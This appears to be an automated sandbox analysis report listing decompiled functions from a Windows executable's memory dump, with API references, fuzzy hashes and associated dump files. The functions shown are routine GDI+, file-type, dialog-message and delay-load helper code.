Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: e6d5375d156b2819238cfb5cda5f11d9a97686cf7b55f6d37fc13ccca98b91cf
Instruction ID: 030d453e83b0c84ebebe46162fc6319dd081d2a16dcbe89407cd2172b06e0512
Opcode Fuzzy Hash: e6d5375d156b2819238cfb5cda5f11d9a97686cf7b55f6d37fc13ccca98b91cf
Instruction Fuzzy Hash: 59D0C220B0041866DA21776C68457FF1906FFC1320F094066B20AF62D2DAA54C8A8AA3

Uniqueness

Uniqueness Score: -1.00%

Function 00849642, Relevance: 1.5, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00849642(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L0084D84A();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00849401(__eax, _a4, _a8); // executed
				return _t6;
			}

0x00849645
0x00849646
0x00849648
0x0084964d
0x00849652
0x00000000
0x00849663
0x0084965c
0x00000000

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00849648

Part of subcall function 00849401: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00849422

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: f9ecb590552b2b580b1cf5339642e2c4e000770527f6ba0c64e2eb0109c3f4cc
Instruction ID: bbea64148871e99652d38a3c5efd0f1c3ce0520241123bf19140ac5cc7fd45df
Opcode Fuzzy Hash: f9ecb590552b2b580b1cf5339642e2c4e000770527f6ba0c64e2eb0109c3f4cc
Instruction Fuzzy Hash: 64D0A73060420C7ADF506F68CC02D7B7A9DFB10300F008075FC45C5251F972CD11A252

Uniqueness

Uniqueness Score: -1.00%

Function 008397E9, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008397E9(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x008397ed
0x008397f5
0x008397fe
0x0083980b
0x00839805
0x00839807
0x00839807
0x008397ef
0x008397f1
0x008397f1

APIs

GetFileType.KERNELBASE(000000FF,0083971B), ref: 008397F5

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 4312290fd9fd410d0cd75907c82753448b416987acbf7dcc2700c45f25d24c57
Instruction ID: 5873268a4e5f5c31b4e14c930caed8155ecc278b9161cec58304e5af6935e3af
Opcode Fuzzy Hash: 4312290fd9fd410d0cd75907c82753448b416987acbf7dcc2700c45f25d24c57
Instruction Fuzzy Hash: 2FD01230021551A58F314A384D494956A51FBC3366F38CAF4D0A6C40E1C763C843F581

Uniqueness

Uniqueness Score: -1.00%

Function 0084CA54, Relevance: 1.5, APIs: 1, Instructions: 13
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0084CA54(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {

				SendDlgItemMessageW( *0x8775e8, 0x6a, 0x402, E0083F77F(_a20, _a24, _a28, _a32), 0); // executed
				return E0084A3FB();
			}

0x0084ca79
0x0084ca84

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0084CA79

Part of subcall function 0084A3FB: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0084A40C
Part of subcall function 0084A3FB: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084A41D
Part of subcall function 0084A3FB: TranslateMessage.USER32(?), ref: 0084A427
Part of subcall function 0084A3FB: DispatchMessageW.USER32(?), ref: 0084A431

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DispatchItemPeekSendTranslate
String ID:
API String ID: 4142818094-0
Opcode ID: 018607fee5f35410b1a6fc8f73bffa0b7eaaddfeb432f7e1eabe602b4721498e
Instruction ID: 5da6879fcee105d896f3640fa97ccd486293ba02bfc50057a712632c76b0c4b9
Opcode Fuzzy Hash: 018607fee5f35410b1a6fc8f73bffa0b7eaaddfeb432f7e1eabe602b4721498e
Instruction Fuzzy Hash: 97D09E72558300AAD6012B51CE07F1A7AA2FB9CB05F014554B349740B186A3DD619B42

Uniqueness

Uniqueness Score: -1.00%

Function 0084D82F, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0084D82F() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac94, 0x86deb4); // executed
				goto __eax;
			}

0x0084d839
0x0084d841
0x0084d848

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D841

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 202abb380abcbda3eeb2c2f93f9effd1919eb499a309cf670c5cc33e54ac94c0
Instruction ID: 8978a21b09efb97ce876ca393076ca72a6be2b95e6b9c80716414d9119090f17
Opcode Fuzzy Hash: 202abb380abcbda3eeb2c2f93f9effd1919eb499a309cf670c5cc33e54ac94c0
Instruction Fuzzy Hash: 24B0128A358309BDB10861441F02C3A020CF1D8B19332853BB421E404098461C050033

Uniqueness

Uniqueness Score: -1.00%

Function 0084D1F9, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0084D1F9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac34, 0x86df08); // executed
				goto __eax;
			}

0x0084d203
0x0084d20b
0x0084d212

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D20B

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b43aead1bb877a8f84f605a0ba4ad76d06dac945e10e2bb008d57647acbfa227
Instruction ID: 3fac2aad5a27861e6e630469f933f5c3d4a9339175cc7a74d85341697e694d7f
Opcode Fuzzy Hash: b43aead1bb877a8f84f605a0ba4ad76d06dac945e10e2bb008d57647acbfa227
Instruction Fuzzy Hash: 83B0129575930D7D71082144AD02C37010CF2C0B16332821BF161D1080EC845D441033

Uniqueness

Uniqueness Score: -1.00%

Function 0084D289, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0084D289() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac54, 0x86dffc); // executed
				goto __eax;
			}

0x0084d264
0x0084d26c
0x0084d273

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D26C

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8726009444e30efe39ec26ac69e04d0ea051183b1e78b06148da0a17b97afe2b
Instruction ID: 40e6b9aa4e0f2aee14b21b9ea87f7229e829dbfd474f031550b500654a0d82ac
Opcode Fuzzy Hash: 8726009444e30efe39ec26ac69e04d0ea051183b1e78b06148da0a17b97afe2b
Instruction Fuzzy Hash: E2B0128135C3196D710851481D02D36010CF1C4B1A332C11BF411C2140DC845C291033

Uniqueness

Uniqueness Score: -1.00%

Function 0084D293, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0084D293() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac54, 0x86dff0); // executed
				goto __eax;
			}

0x0084d264
0x0084d26c
0x0084d273

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D26C

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 46e10047f2e682c3a5886c2e3ee12ab7d7515883030e6a52378797d0e3335604
Instruction ID: 0b1796f0aaf7762b37c3b88435c4dc3cbc1347c350a048b5e4542c6d2f97c6b9
Opcode Fuzzy Hash: 46e10047f2e682c3a5886c2e3ee12ab7d7515883030e6a52378797d0e3335604
Instruction Fuzzy Hash: F0B0128135C3096D710851491D02E36010CF1C4B1A332811BF011C2140DCC45C291033

Uniqueness

Uniqueness Score: -1.00%

Function 0084D214, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0084D214() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac34, 0x86df10); // executed
				goto __eax;
			}

0x0084d203
0x0084d20b
0x0084d212

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D20B

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: afc590d2c40d2889619410825b9510ab79ef115cb6e04ad496af6583e2133269
Instruction ID: a3d9cd165629a3f95f97f92ad4f9b60572408e0f246f6504ae27ad2661bbd809
Opcode Fuzzy Hash: afc590d2c40d2889619410825b9510ab79ef115cb6e04ad496af6583e2133269
Instruction Fuzzy Hash: 40B012A575930D6D710851491D02D37010CF1C4B16332951BF121C1184ECC45C141033

Uniqueness

Uniqueness Score: -1.00%

Function 0084D21E, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0084D21E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac34, 0x86df0c); // executed
				goto __eax;
			}

0x0084d203
0x0084d20b
0x0084d212

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D20B

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f5d435fcb25005faf1b7028a0950038aedb704a67d77c19c6d8dd767c1b0f592
Instruction ID: b61445a13b68548c54aaeb28bec9265c068ba40424068d8c028463da206a0f0b
Opcode Fuzzy Hash: f5d435fcb25005faf1b7028a0950038aedb704a67d77c19c6d8dd767c1b0f592
Instruction Fuzzy Hash: BAB0129575930D6D710851481D02D37021CF1C4B16332C11BF521C2140ED845C041033

Uniqueness

Uniqueness Score: -1.00%

Function 0084D232, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0084D232() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac34, 0x86df04); // executed
				goto __eax;
			}

0x0084d203
0x0084d20b
0x0084d212

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D20B

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ea06b4c2bc54b0349cab7e97e78e76cec2b2ff1ec4d0ec03e5e6f5989066666e
Instruction ID: 46aee70826a5b83c4fcb242031356ee5a92cf94e4b12c7fe46f997cd2f64bdd8
Opcode Fuzzy Hash: ea06b4c2bc54b0349cab7e97e78e76cec2b2ff1ec4d0ec03e5e6f5989066666e
Instruction Fuzzy Hash: 94B0129575930D6D710851481E02D37010CF1C8B16332811BF121C2140EC855C051033

Uniqueness

Uniqueness Score: -1.00%

Function 0084D25A, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0084D25A() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac54, 0x86dff8); // executed
				goto __eax;
			}

0x0084d264
0x0084d26c
0x0084d273

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D26C

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c55bd3cfb02389d5b09ad1f7c4eda31743b9a6441af0c9234cf71c145522417c
Instruction ID: 5f9bb52564b461ec604516258def535501ae8f1b769dc4c083bd57f9f3285102
Opcode Fuzzy Hash: c55bd3cfb02389d5b09ad1f7c4eda31743b9a6441af0c9234cf71c145522417c
Instruction Fuzzy Hash: A0B012C135C3097D710811451D02C36010CF2C0B1E332821BF021D10809C845C691433

Uniqueness

Uniqueness Score: -1.00%

Function 0084D284, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0084D284() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x86ac54); // executed
				E0084D58F(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0084d267
0x0084d26c
0x0084d273

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D26C

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a5cc2df9f0ae81b8d9a1ea2b0f15ae644d3f1f2e16d08da894c87a9bd6f2f237
Instruction ID: d118b5e02f6a78512c48f78d0e6aafdd21c35933aaa242817c7f849bd292739f
Opcode Fuzzy Hash: a5cc2df9f0ae81b8d9a1ea2b0f15ae644d3f1f2e16d08da894c87a9bd6f2f237
Instruction Fuzzy Hash: F1A0128115C30A7C700811001D02C36010CE0C4B56331850AF011C1040588418251033

Uniqueness

Uniqueness Score: -1.00%

Function 0084D22D, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0084D22D() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x86ac34); // executed
				E0084D58F(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0084d206
0x0084d20b
0x0084d212

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D20B

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 54f4234c0b6c5acb1233f7548a7b0b2592777eead7a01861d2359489feb613d6
Instruction ID: d8b362befab61a141cd4c6d12d88266e21273a247d59af3dd83c55bf28e9437f
Opcode Fuzzy Hash: 54f4234c0b6c5acb1233f7548a7b0b2592777eead7a01861d2359489feb613d6
Instruction Fuzzy Hash: 70A011AA2AA20EBCB00822002E02C3B020CE0C8B2A3328A0AF022C0080A88828002033

Uniqueness

Uniqueness Score: -1.00%

Function 0084D241, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0084D241() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x86ac34); // executed
				E0084D58F(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0084d206
0x0084d20b
0x0084d212

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D20B

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0bedfbe3455bf72b89fa923423a6f075349c365bbca88c12ee6f5b3444fa9d7c
Instruction ID: d8b362befab61a141cd4c6d12d88266e21273a247d59af3dd83c55bf28e9437f
Opcode Fuzzy Hash: 0bedfbe3455bf72b89fa923423a6f075349c365bbca88c12ee6f5b3444fa9d7c
Instruction Fuzzy Hash: 70A011AA2AA20EBCB00822002E02C3B020CE0C8B2A3328A0AF022C0080A88828002033

Uniqueness

Uniqueness Score: -1.00%

Function 0084D24B, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0084D24B() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x86ac34); // executed
				E0084D58F(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0084d206
0x0084d20b
0x0084d212

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D20B

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 374dd894490a557a23677faa24d4a76335171c0f0a7c4d084cc1a37b9f0c89cd
Instruction ID: d8b362befab61a141cd4c6d12d88266e21273a247d59af3dd83c55bf28e9437f
Opcode Fuzzy Hash: 374dd894490a557a23677faa24d4a76335171c0f0a7c4d084cc1a37b9f0c89cd
Instruction Fuzzy Hash: 70A011AA2AA20EBCB00822002E02C3B020CE0C8B2A3328A0AF022C0080A88828002033

Uniqueness

Uniqueness Score: -1.00%

Function 0084D255, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0084D255() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x86ac34); // executed
				E0084D58F(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0084d206
0x0084d20b
0x0084d212

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D20B

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
